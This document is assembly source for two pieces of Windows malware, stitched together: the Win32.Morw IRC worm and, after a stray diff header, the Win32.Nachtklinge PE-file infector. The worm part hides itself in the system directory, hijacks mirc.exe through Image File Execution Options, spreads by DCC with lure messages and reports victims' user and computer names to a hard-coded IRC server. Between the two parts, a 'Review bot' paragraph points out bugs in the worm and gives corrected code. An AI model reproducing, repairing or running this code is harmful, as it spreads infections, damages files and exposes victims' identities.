db 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D
db 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31
db 0x30, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68
db 0x65, 0x68, 0x65, 0x68, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x65, 0x63, 0x6B, 0x20, 0x6F, 0x75, 0x74
db 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6E, 0x6E, 0x79, 0x20, 0x73, 0x63, 0x72, 0x65
db 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66
db 0x20, 0x3D, 0x20, 0x46, 0x75, 0x6E, 0x6E, 0x79, 0x2E, 0x73, 0x63, 0x72, 0x0D, 0x0A, 0x7D, 0x0D
db 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31, 0x31
db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x77, 0x6F
db 0x77, 0x2C, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20, 0x70, 0x72, 0x65
db 0x74, 0x74, 0x79, 0x20, 0x64, 0x61, 0x6D, 0x6E, 0x20, 0x73, 0x65, 0x78, 0x79, 0x20, 0x73, 0x63
db 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x2E, 0x2E, 0x20, 0x63, 0x68, 0x65
db 0x63, 0x6B, 0x20, 0x69, 0x74, 0x2C, 0x20, 0x69, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x2E, 0x2E, 0x2E
db 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x53, 0x65, 0x78, 0x79, 0x53
db 0x63, 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x73, 0x63, 0x72, 0x0D, 0x0A
db 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20
db 0x31, 0x32, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20
db 0x68, 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x63, 0x72, 0x65
db 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2C, 0x20, 0x77, 0x61, 0x69, 0x74, 0x2C, 0x20, 0x69
db 0x20, 0x64, 0x63, 0x63, 0x20, 0x69, 0x74, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20
db 0x3D, 0x20, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x73, 0x63
db 0x72, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x2F, 0x6D, 0x73, 0x67, 0x20, 0x25, 0x6E, 0x20, 0x25, 0x73
db 0x0D, 0x0A, 0
MorwCode:
invoke GetModuleFileName,\
0,\
CurrentFile,\
256d
invoke GetSystemDirectory,\
SystemDir,\
256d
invoke lstrlen,\
CurrentFile
mov ebx, CurrentFile
add ebx, eax
sub ebx, 8d
mov ecx, dword [WormName]
cmp dword [ebx], ecx
je StartMirc
invoke lstrcpy,\
WormFile,\
SystemDir
invoke lstrcat,\
WormFile,\
"\"
invoke lstrcat,\
WormFile,\
WormName
invoke SetFileAttributes,\
WormFile,\
FILE_ATTRIBUTE_NORMAL
invoke CopyFile,\
CurrentFile,\
WormFile,\
0
cmp eax, 0
je NeedRoot
invoke SetFileAttributes,\
WormFile,\
FILE_ATTRIBUTE_HIDDEN
mov ebx, 1d
call UnTrapMirc
jmp Exit
StartMirc:
invoke lstrcpy,\
WormFile,\
CurrentFile
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\MorwBy.DiA"
invoke CopyFile,\
WormFile,\
CurrentFile,\
0
cmp eax, 0
je NeedRoot
invoke DeleteFile,\
CurrentFile
invoke RegOpenKeyEx,\
HKEY_LOCAL_MACHINE,\
MircRegKey,\
0,\
KEY_QUERY_VALUE,\
MircPathHandle
cmp eax, 0
jne Exit
invoke RegQueryValueEx,\
dword [MircPathHandle],\
UninstallString,\
0,\
0,\
CurrentFile,\
MircPathSize
cmp eax, 0
jne Exit
invoke RegCloseKey,\
dword [MircRegKey]
invoke lstrlen,\
CurrentFile
mov ebx, CurrentFile
inc ebx
mov ecx, eax
sub ecx, 12d
invoke lstrcpyn,\
MircPath,\
ebx,\
ecx
mov ebx, 0d
call UnTrapMirc
invoke CreateProcess,\
MircPath,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo
cmp eax, 0
je Exit
mov ebx, 1d
call UnTrapMirc
Check:
invoke GetSystemTime,\
SystemTime
cmp word [SystemTime.wDay], 27d
jne BeginToCopy
call Payload
BeginToCopy:
mov ebx, 1d
call CopyDeleteFiles
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke CreateFile,\
CurrentFile,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_ALWAYS,\
FILE_ATTRIBUTE_HIDDEN,\
0
mov dword [ScriptHandle], eax
cmp eax, INVALID_HANDLE_VALUE
je Exit
invoke lstrlen,\
MircScript
invoke WriteFile,\
dword [ScriptHandle],\
MircScript,\
eax,\
BytesWritten,\
0
invoke lstrcpy,\
CurrentFile,\
"/dcc send -cl %n "
invoke lstrcat,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\ $+ %f"
invoke lstrcat,\
CurrentFile,\
ScriptFoot
invoke lstrlen,\
CurrentFile
invoke WriteFile,\
dword [ScriptHandle],\
CurrentFile,\
eax,\
BytesWritten,\
0
invoke lstrcpy,\
CurrentFile,\
"on 1:EXIT:/unload -rs "
invoke lstrcat,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke lstrlen,\
CurrentFile
invoke WriteFile,\
dword [ScriptHandle],\
CurrentFile,\
eax,\
BytesWritten,\
0
invoke CloseHandle,\
dword [ScriptHandle]
invoke Sleep,\
120000d
invoke FindWindow,\
MircWindowName,\
0
mov dword [MircHandle], eax
cmp eax, 0
je Exit
invoke CreateFileMapping,\
INVALID_HANDLE_VALUE,\
0,\
PAGE_READWRITE,\
0,\
4096d,\
MircWindowName
mov dword [FileMap], eax
cmp eax, 0
je Exit
invoke MapViewOfFile,\
dword [FileMap],\
FILE_MAP_ALL_ACCESS,\
0,\
0,\
0
mov dword [MircData], eax
cmp eax, 0
je CloseHandles
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke lstrcpy,\
dword [MircData],\
"//load -rs "
invoke lstrcat,\
dword [MircData],\
CurrentFile
invoke SendMessage,\
dword [MircHandle],\
WM_USER + 200d,\
1d,\
0
WaitForExit:
invoke FindWindow,\
MircWindowName,\
0
cmp eax, 0
je MircTerminated
invoke Sleep,\
1000d
jmp WaitForExit
MircTerminated:
mov ebx, 0d
call CopyDeleteFiles
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
ScriptFile
invoke DeleteFile,\
CurrentFile
CloseHandles:
invoke UnmapViewOfFile,\
dword [MircData]
invoke CloseHandle,\
dword [FileMap]
invoke CloseHandle,\
dword [MircHandle]
jmp Exit
NeedRoot:
invoke MessageBox,\
0,\
"Please execute this application as Administrator.",\
0,\
MB_ICONERROR
Exit:
invoke ExitProcess, 0
UnTrapMirc:
jmp UnTrapMircStart
RegFileExec db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options", 0
RegHandle dd ?
MircName db "mirc.exe", 0
RegMircHandle dd ?
UntrapValue db "", 0
Debugger db "Debugger", 0
UnTrapMircStart:
;in: ebx = trap (1) or untrap (0)
; WormFile = must be path to the installed worm path
;out: eax = error (131313h) or ok (1)
invoke RegOpenKeyEx,\
HKEY_LOCAL_MACHINE,\
RegFileExec,\
0,\
KEY_ALL_ACCESS,\
RegHandle
cmp eax, 0
jne UnTrapMircError
invoke RegCreateKey,\
dword [RegHandle],\
MircName,\
RegMircHandle
cmp eax, 0
jne UnTrapMircError
cmp ebx, 1d
je TrapMirc
mov edx, UntrapValue
jmp SetValue
TrapMirc:
mov edx, WormFile
SetValue:
invoke lstrlen,\
edx
inc eax
dec edx
invoke RegSetValueEx,\
dword [RegMircHandle],\
Debugger,\
0,\
REG_SZ,\
edx,\
eax
mov ecx, eax
UnTrapMircError:
invoke RegCloseKey,\
dword [RegMircHandle]
invoke RegCloseKey,\
dword [RegHandle]
cmp ecx, 0h
je UnTrapMircOk
mov eax, 131313h
jmp UnTrapMircReturn
UnTrapMircOk:
mov eax, 1d
UnTrapMircReturn:
ret
CopyDeleteFiles:
;in: ebx = Copy (1) or Delete (0)
;out: nothing
mov edx, FilesTable
mov ecx, 0
GetFileName:
cmp byte [edx + ecx], 10d
je HaveFileName
cmp byte [edx + ecx], 0
je CopyDeleteReturn
inc ecx
jmp GetFileName
HaveFileName:
inc ecx
push edx
push ecx
invoke lstrcpyn,\
FileBuffer,\
edx,\
ecx
invoke lstrcpy,\
CurrentFile,\
SystemDir
invoke lstrcat,\
CurrentFile,\
"\"
invoke lstrcat,\
CurrentFile,\
FileBuffer
cmp ebx, 0d
je DeleteFileX
invoke CopyFile,\
WormFile,\
CurrentFile,\
0
pop ecx
pop edx
add edx, ecx
mov ecx, 0
jmp GetFileName
DeleteFileX:
invoke SetFileAttributes,\
CurrentFile,\
FILE_ATTRIBUTE_HIDDEN
invoke DeleteFile,\
CurrentFile
pop ecx
pop edx
add edx, ecx
mov ecx, 0
jmp GetFileName
CopyDeleteReturn:
ret
Payload:
jmp PayloadStart
WSAData WSADATA
SockAddr dw AF_INET
SockAddr_Port dw ?
SockAddr_IP dd ?
SockAddr_Zero rb 8d
SocketDesc dd ?
CharBuff rb 2d
LineBuff rb 256d
Pong db "PONG "
PongBuff rb 16d
UserName rb 26d
UserNameSize dd 26d
CompName rb 26d
CompNameSize dd 26d
Nick rb 26d
CRLF db 10d, 13d, 0
PayloadStart:
invoke GetUserName,\
UserName,\
UserNameSize
invoke GetComputerName,\
CompName,\
CompNameSize
mov ecx, 0
GenerateNick:
cmp ecx, 8d
je HaveNick
mov al, byte [UserName + ecx]
mov byte [Nick + ecx], al
inc ecx
mov al, byte [CompName + ecx - 1]
mov byte [Nick + ecx], al
inc ecx
jmp GenerateNick
HaveNick:
invoke lstrcat,\
Nick,\
"morw"
invoke lstrlen,\
Nick
invoke CharLowerBuff,\
Nick,\
eax
invoke WSAStartup,\
0101h,\
WSAData
cmp eax, 0
jne PayloadReturn
invoke socket,\
AF_INET,\
SOCK_STREAM,\
0
mov dword [SocketDesc], eax
cmp eax, -1
je PayloadReturn
invoke inet_addr,\
"69.16.172.34"
mov dword [SockAddr_IP], eax
invoke htons,\
6667d
mov word [SockAddr_Port], ax
invoke connect,\
dword [SocketDesc],\
SockAddr,\
16d
cmp eax, 0
jne PayloadReturn
invoke lstrcpy,\
LineBuff,\
"NICK "
invoke lstrcat,\
LineBuff,\
Nick
call SendLine
invoke lstrcpy,\
LineBuff,\
"USER "
invoke lstrcat,\
LineBuff,\
Nick
invoke lstrcat,\
LineBuff,\
" 8 * :"
invoke lstrcat,\
LineBuff,\
Nick
invoke lstrcat,\
LineBuff,\
" "
invoke lstrcat,\
LineBuff,\
Nick
call SendLine
GetMotd:
call RecvLine
call HandlePing
mov ecx, 0
IsMotd:
cmp dword [LineBuff + ecx], "MOTD"
je HaveMotd
cmp byte [LineBuff + ecx], 0d
je LineEnd
inc ecx
jmp IsMotd
LineEnd:
jmp GetMotd
HaveMotd:
invoke lstrcpy, LineBuff,\
"JOIN #vx-lab"
call SendLine
invoke Sleep,\
1000d
invoke lstrcpy,\
LineBuff,\
"PRIVMSG #vx-lab :Win32.Morw got "
invoke lstrcat,\
LineBuff,\
UserName
invoke lstrcat,\
LineBuff,\
" on "
invoke lstrcat,\
LineBuff,\
CompName
call SendLine
invoke lstrcpy,\
LineBuff,\
"QUIT"
call SendLine
PayloadReturn:
ret
RecvLine:
invoke lstrcpy,\
LineBuff,\
""
GetLine:
invoke recv,\
dword [SocketDesc],\
CharBuff,\
1d,\
0
cmp eax, 0
je PayloadReturn
cmp byte [CharBuff], 10d
je HaveLine
invoke lstrcat,\
LineBuff,\
CharBuff
jmp GetLine
HaveLine:
ret
SendLine:
invoke lstrcat,\
LineBuff,\
CRLF
invoke lstrlen,\
LineBuff
invoke send,\
dword [SocketDesc],\
LineBuff,\
eax,\
0
cmp eax, -1
je PayloadReturn
ret
HandlePing:
cmp dword [LineBuff], "PING"
jne NoPing
invoke lstrcpy,\
PongBuff,\
LineBuff + 6d
invoke lstrcpy,\
LineBuff,\
Pong
call SendLine
NoPing:
ret
section "i" import data readable writeable
;==============================================
library kernel32, "kernel32.dll",\
advapi32, "advapi32.dll",\
user32, "user32.dll",\
winsock, "ws2_32.dll"
import kernel32,\
lstrlen, "lstrlenA",\
lstrcpy, "lstrcpyA",\
lstrcat, "lstrcatA",\
lstrcpyn, "lstrcpynA",\
GetModuleFileName, "GetModuleFileNameA",\
GetSystemDirectory, "GetSystemDirectoryA",\
CopyFile, "CopyFileA",\
CreateFileMapping, "CreateFileMappingA",\
MapViewOfFile, "MapViewOfFile",\
UnmapViewOfFile, "UnmapViewOfFile",\
CloseHandle, "CloseHandle",\
CreateProcess, "CreateProcessA",\
Sleep, "Sleep",\
SetFileAttributes, "SetFileAttributesA",\
CreateFile, "CreateFileA",\
DeleteFile, "DeleteFileA",\
WriteFile, "WriteFile",\
GetComputerName, "GetComputerNameA",\
GetSystemTime, "GetSystemTime",\
ExitProcess, "ExitProcess"
import advapi32,\
RegOpenKeyEx, "RegOpenKeyExA",\
RegCreateKey, "RegCreateKeyA",\
RegSetValueEx, "RegSetValueExA",\
RegQueryValueEx, "RegQueryValueExA",\
RegCloseKey, "RegCloseKey",\
GetUserName, "GetUserNameA"
import user32,\
MessageBox, "MessageBoxA",\
FindWindow, "FindWindowA",\
SendMessage, "SendMessageA",\
CharLowerBuff, "CharLowerBuffA"
import winsock,\
WSAStartup, "WSAStartup",\
socket, "socket",\
inet_addr, "inet_addr",\
htons, "htons",\
connect, "connect",\
recv, "recv",\
send, "send"
section "r" resource data readable
;=====================================
directory RT_ICON, icons,\
RT_GROUP_ICON, group_icons,\
RT_VERSION, versions
resource icons,\
1,\
LANG_NEUTRAL,\
icon_data
resource group_icons,\
17,\
LANG_NEUTRAL,\
main_icon
resource versions,\
1,\
LANG_NEUTRAL,\
version
icon main_icon,\
icon_data,\
"Morw.ico"
versioninfo version,\
VOS__WINDOWS32, VFT_APP, VFT2_UNKNOWN, LANG_ENGLISH, 0,\
"FileDescription", "Self Extracting Archive",\
"LegalCopyright", "RRLF Compressing Inc.",\
"FileVersion", "1.0",\
"ProductVersion", "1.0",\
"OriginalFilename", "Archive.ZIP"
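Review bot: The RegCloseKey invoked right after RegQueryValueEx in the StartMirc path passes `dword [MircRegKey]`, the first four bytes of the key-name string, instead of the handle that RegOpenKeyEx stored in `MircPathHandle`, so the opened key is never released and a garbage value is handed to the API; it should read `invoke RegCloseKey, dword [MircPathHandle]`. In UnTrapMirc the two `jne UnTrapMircError` exits reach `cmp ecx, 0h` with ecx never written on that path (it is only set by `mov ecx, eax` after RegSetValueEx), so the ok/error result depends on stale register contents, and on the first failure path the second RegCloseKey is given an unset `RegMircHandle`. Also note that `MircRegKey` has no terminating zero, so RegOpenKeyEx reads whatever follows it in memory as part of the key name. A header comment above UnTrapMirc stating that persistence is the `Debugger` value under `Image File Execution Options\mirc.exe` pointing at the copy in the system directory, together with the hidden `morw.mrc` script, would make the observable artifacts explicit for anyone triaging a sample.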
+694
@@ -0,0 +1,694 @@
;
; Name: Win32.Nachtklinge
;
; Type: Runtime PE-Infector
;
; Coder: BeLiAL/bcvg
;
; Comment: - Eats HD-space (when win32.nachtklinge finds a file which is
; already infected or not infectable, the filesize will increased (60kb))
; - Infects first 50 files on all HDs in all dirs !!
; - Nachtklinge has a bug, it crashes on some files, but
; i dunno wether it was my fault or the coder of the file
; was cleverer than i was ;)
;
; Greetings: Greetings go out to the whole BlackCat group, espacially to Dr_T and
; SatanicC0der
; also a "hello" to toro, Sinist3r and cwarrior alias daniel'
;
; One important thing: Puppet on Undernet (#winnuke) is totally lame (he is the coder of
; NukeNabber). When u see him, give him greetings from me and
; congratulate him to his amazing coding skills.
;
;
; BeLiAL 2001
; http://home.foni.net/~belial
;
;
;
; Schwarz verbreitet sich in meinem Kopf
; ganz aufgequollen, mein Augenlicht zersetzt,
; das Herz verbrennt im weißen Nichts,
; und doch es wird...
.386
.model flat
Extrn ExitProcess:Proc
virussize EQU offset virusend - offset start
MAX_PATH EQU 260
DIR_ATTRIB EQU 10h
DRIVE_FIXED EQU 3h
.data
db 0
.code
start:
call deltastuff
deltastuff:
pop ebp
sub ebp,offset deltastuff
mov eax,dword ptr [ebp+old_entry]
mov dword ptr [ebp+old_entry_save],eax
call locate_kernel ;copies kernel address to eax
mov dword ptr [ebp+kerneloffset],eax
call get_export_table ;expects kernel address in eax
lea eax,[ebp+offset LoadLibrary]
call get_kernel_api ;find an API in kernel
lea eax,[ebp+offset GetProcAddress]
call get_kernel_api
call get_apis
mov byte ptr [ebp+infection_counter],0
pop eax
push eax
mov dword ptr [ebp+stackshit],eax
lea eax,[ebp+offset directorybuffer]
push eax
push 256
call [ebp+GetCurrentDirectory]
new_round:
lea eax,[ebp+offset thedrive]
push eax
call [ebp+SetCurrentDirectory]
cmp eax,0
je exit_routine
call InfectCurrentDir
findfirstdir:
lea eax,[ebp+FindFileData]
push eax
lea eax,[ebp+offset dirstring]
push eax
call [ebp+FindFirstFile]
mov dword ptr [ebp+dirhandle],eax
inc eax
jz go_one_down
cmp word ptr [ebp+FindFileData.cFileName],2e2eh
je findnextdir1
cmp word ptr [ebp+FindFileData.cFileName],002eh
je findnextdir1
cmp dword ptr [ebp+FindFileData.dwFileAttributes],DIR_ATTRIB
jne findnextdir1
push dword ptr [ebp+dirhandle]
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+SetCurrentDirectory]
call InfectCurrentDir
jmp findfirstdir
findnextdir1:
mov eax,dword ptr [ebp+dirhandle]
findnextdir:
lea ebx,[ebp+offset FindFileData]
push ebx
push eax
call [ebp+FindNextFile]
test eax,eax
jz go_one_down
cmp word ptr [ebp+FindFileData.cFileName],2e2eh
je findnextdir1
cmp word ptr [ebp+FindFileData.cFileName],2e00h
je findnextdir1
cmp word ptr [FindFileData.cFileName],002eh
je findnextdir1
cmp dword ptr [ebp+FindFileData.dwFileAttributes],DIR_ATTRIB
jne findnextdir1
push dword ptr [ebp+dirhandle]
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+SetCurrentDirectory]
call InfectCurrentDir
jmp findfirstdir
exit_routine:
add byte ptr [ebp+thedrive],1
lea eax,[ebp+offset thedrive]
push eax
call [ebp+GetDriveType]
cmp eax,DRIVE_FIXED
je new_round
lea eax,[ebp+offset directorybuffer]
push eax
call [ebp+SetCurrentDirectory]
jmp return_host
go_one_down:
lea eax,[ebp+offset dotdot]
push eax
call [ebp+SetCurrentDirectory]
push dword ptr [ebp+dirhandle]
call [ebp+FindClose]
pop eax
mov dword ptr [ebp+dirhandle],eax
mov ebx,dword ptr [ebp+stackshit]
cmp eax,ebx
jne findnextdir1
push eax
jmp exit_routine
return_host:
cmp ebp,0
jne not1stgeneration
push 0
call ExitProcess
not1stgeneration:
mov eax,dword ptr [ebp+old_entry_save]
jmp eax
;------------------------------procedures----------------------------------------
locate_kernel proc
mov dword ptr [ebp+stack_buffer],ebx
pop ebx
pop eax
push eax
push ebx
mov ax,0000h
is_this_mz:
cmp word ptr [eax],'ZM'
je found_mz
sub eax,10000h
jmp is_this_mz
found_mz:
mov ebx,dword ptr [ebp+stack_buffer]
ret
stack_buffer dd 0
endp
get_export_table proc
pushad
mov ebx,dword ptr [eax+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jne prepare_for_jumping_back
mov esi,dword ptr [eax+78h] ;go to exporttable
add esi,dword ptr [ebp+kerneloffset]
add esi,1ch
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kerneloffset] ;Offset of RVA of the function_names_table
mov [ebp+dword ptr Api_Adress_Table],eax
add esi,4
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kerneloffset] ;Offset of RVA of the function_names_table
mov [ebp+dword ptr Api_Name_Table],eax
add esi,4
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kerneloffset] ;Offset of RVA of the function_names_table
mov [ebp+dword ptr Api_Ordinary_Table],eax
popad
ret
prepare_for_jumping_back:
popad
pop eax
jmp return_host
endp
get_kernel_api proc
pushad
push eax
add eax,4
call get_string_lenght
mov dword ptr [ebp+Current_API_Lenght],eax
pop eax
mov ebx,dword ptr [ebp+Api_Name_Table]
mov edx,0
string_find_loop:
mov ecx,dword ptr [ebp+Current_API_Lenght]
lea esi,[eax+4]
mov edi,dword ptr [ebx]
add edi,dword ptr [ebp+kerneloffset]
rep cmpsb
je found_API_string
add edx,1
add ebx,4
jmp string_find_loop
found_API_string:
shl edx,1
add edx,dword ptr [ebp+Api_Ordinary_Table]
mov ebx,0
mov bx,word ptr [edx]
shl bx,2
add ebx,dword ptr [ebp+Api_Adress_Table]
mov edx,dword ptr [ebx]
add edx,dword ptr [ebp+kerneloffset]
mov dword ptr [eax],edx
popad
ret
endp
get_string_lenght proc ;offset of string in eax
push ecx
mov ecx,0
find_the_end_again:
cmp byte ptr [eax],00h
je found_lenght
inc ecx
inc eax
jmp find_the_end_again
found_lenght:
mov eax,ecx
pop ecx
ret
endp
get_apis proc
pushad
lea eax,[ebp+offset kernel32]
push eax
call [ebp+LoadLibrary]
mov dword ptr [ebp+kernelmodulhandle],eax
mov ebx,eax
lea edx,[ebp+offset CreateFile]
find_the_next_one:
push edx
push ebx
add edx,4
push edx
push ebx
call [ebp+GetProcAddress]
pop ebx
pop edx
mov dword ptr [edx],eax
cmp eax,0
je prepare_for_jumping_back
add edx,4
mov eax,edx
call get_string_lenght
add edx,eax
inc edx
cmp byte ptr [edx],'e'
je found_them_all
jmp find_the_next_one
found_them_all:
popad
ret
endp
InfectCurrentDir proc
pushad
findfirstfile:
lea eax,[ebp+offset FindFileData]
push eax
lea eax,[ebp+offset exestring]
push eax
call [ebp+FindFirstFile]
mov dword ptr [ebp+findfilehandle],eax
inc eax
jz no_files_left
jmp infect_the_file
find_next_file:
lea eax,[ebp+offset FindFileData]
push eax
push dword ptr [ebp+findfilehandle]
call [ebp+FindNextFile]
test eax,eax
jz no_files_left
infect_the_file:
push 0
push 0
push 3
push 0
push 1
push 80000000h + 40000000h
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+CreateFile]
cmp eax,0ffffffffh
je find_next_file
mov dword ptr [ebp+filehandle],eax
lea eax,[ebp+offset lastwrite]
push eax
lea eax,[ebp+offset lastaccess]
push eax
lea eax,[ebp+offset creationtime]
push eax
push dword ptr [ebp+filehandle]
call [ebp+GetFileTime]
push 0
push dword ptr [ebp+filehandle]
call [ebp+GetFileSize]
mov dword ptr [ebp+filesize],eax
add eax,virussize
push eax
push 0
push eax
push 0
push 4
push 0
push dword ptr [ebp+filehandle]
call [ebp+CreateFileMapping]
mov dword ptr [ebp+filemaphandle],eax
pop ebx ;not silly, just a personal note
push ebx
push 0
push 0
push 2
push eax
call [ebp+MapViewOfFile]
mov dword ptr [ebp+filemapaddress],eax
;The infection starts here!!!!!!!
cmp word ptr [eax+38h],';;'
je make_file_bigger
mov word ptr [eax+38h],';;'
mov ebx,dword ptr [eax+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jne close_handles
mov ebx,dword ptr [eax+28h] ;file entry point
add ebx,dword ptr [eax+34h] ;+image base
mov dword ptr [ebp+old_entry],ebx ;=old entry point ;)
mov ebx,dword ptr [eax+3ch]
mov dword ptr [ebp+file_alignment],ebx
xor edx,edx
mov dx,word ptr [eax+14h] ;size of optional_header
add edx,eax
add edx,18h ;size of image_header
;the section-headers begin in edx
push eax
push edx
;number of sections = eax+6h
mov cx,word ptr [eax+6h]
mov ax,cx ;nr of sections in ax
dec ax ;first section is section number 0
xor ecx,ecx
mov word ptr [ebp+section_counter],0
find_last_section:
mov ebx,dword ptr [edx+14h]
cmp ebx,ecx
jz not_bigger
section_bigger:
mov si,word ptr [ebp+section_counter]
not_bigger:
cmp ax,word ptr [ebp+section_counter]
je found_last_section
add word ptr [ebp+section_counter],1
mov ecx,dword ptr [edx+14h]
add edx,28h
jmp find_last_section
found_last_section:
mov eax,28h
xor ecx,ecx
mov cx,si
mul ecx
pop edx
add edx,eax
pop eax ;eax=offset PE edx=offset last section header
or dword ptr [edx+24h],00000020h
or dword ptr [edx+24h],20000000h
or dword ptr [edx+24h],80000000h ;changed the attributes of the last section
mov ebx,dword ptr [edx+8h]
mov dword ptr [ebp+old_section_size],ebx
add ebx,virussize
add dword ptr [edx+8h],ebx ;virtualsize is patched and saved
mov ebx,dword ptr [edx+10h]
mov dword ptr [ebp+old_raw_size],ebx
push eax
push edx
mov eax,dword ptr [edx+8h]
xor edx,edx
mov ebx,dword ptr [ebp+file_alignment]
div ebx
sub ebx,edx
pop edx
pop eax
mov ecx,dword ptr [edx+8h]
add ecx,ebx
mov dword ptr [edx+10h],ecx ;size of raw data patched and saved
mov ebx,dword ptr [edx+0ch]
add ebx,dword ptr [ebp+old_section_size]
mov dword ptr [eax+28h],ebx ;now we have a new entry point
mov ebx,dword ptr [edx+10h]
add ebx,dword ptr [ebp+old_raw_size]
add ebx,1000h
add dword ptr [eax+50h],ebx ;size_of_image is patched
mov ebx,dword ptr [edx+14h]
add ebx,dword ptr [ebp+old_section_size]
add ebx,dword ptr [ebp+filemapaddress]
mov edi,ebx
lea esi,[ebp+offset start]
mov ecx,virussize
rep movsb ;virus is at the end
add byte ptr [ebp+infection_counter],1
jmp close_handles
make_file_bigger:
push dword ptr [ebp+filemapaddress]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+filemaphandle]
call [ebp+CloseHandle]
mov eax,dword ptr [ebp+filesize]
add eax,0ffffh
push eax
push 0
push eax
push 0
push 4
push 0
push dword ptr [ebp+filehandle]
call [ebp+CreateFileMapping]
mov dword ptr [ebp+filemaphandle],eax
pop ebx ;saw it already anywhere else ? ;)
push ebx
push 0
push 0
push 2
push eax
call [ebp+MapViewOfFile]
mov dword ptr [ebp+filemapaddress],eax
close_handles:
push dword ptr [ebp+filemapaddress]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+filemaphandle]
call [ebp+CloseHandle]
lea eax,[ebp+offset lastwrite]
push eax
lea eax,[ebp+offset lastaccess]
push eax
lea eax,[ebp+offset creationtime]
push eax
push dword ptr [ebp+filehandle]
call [ebp+SetFileTime]
push dword ptr [ebp+filehandle]
call [ebp+CloseHandle]
cmp byte ptr [ebp+infection_counter],50
jne find_next_file
popad
clear_stack:
pop eax
cmp eax,dword ptr [ebp+stackshit]
jne clear_stack
jmp return_host
no_files_left:
push dword ptr [ebp+findfilehandle]
call [ebp+FindClose]
popad
ret
endp
;-----------------------------------variables----------------------------
kerneloffset dd 0
Api_Adress_Table dd 0
Api_Name_Table dd 0
Api_Ordinary_Table dd 0
Current_API_Lenght dd 0
LoadLibrary dd 0
LoadLibrary_ db "LoadLibraryA",0
GetProcAddress dd 0
GetProcAddress_ db "GetProcAddress",0
kernel32 db "kernel32.dll",0
kernelmodulhandle dd 0
CreateFile dd 0
CreateFile_ db "CreateFileA",0
CreateFileMapping dd 0
CreateFileMapping_ db "CreateFileMappingA",0
MapViewOfFile dd 0
MapViewOfFile_ db "MapViewOfFile",0
CloseHandle dd 0
CloseHandle_ db "CloseHandle",0
FindClose dd 0
FindClose_ db "FindClose",0
UnmapViewOfFile dd 0
UnmapViewOfFile_ db "UnmapViewOfFile",0
FindFirstFile dd 0
FindFirstFile_ db "FindFirstFileA",0
FindNextFile dd 0
FindNextFile_ db "FindNextFileA",0
GetFileSize dd 0
GetFileSize_ db "GetFileSize",0
GetFileTime dd 0
GetFileTime_ db "GetFileTime",0
SetFileTime dd 0
SetFileTime_ db "SetFileTime",0
GetCurrentDirectory dd 0
db "GetCurrentDirectoryA",0
SetCurrentDirectory dd 0
db "SetCurrentDirectoryA",0
GetDriveType dd 0
db "GetDriveTypeA",0
db "e"
findfilehandle dd 0
dirhandle dd 0
filehandle dd 0
filemaphandle dd 0
filemapaddress dd 0
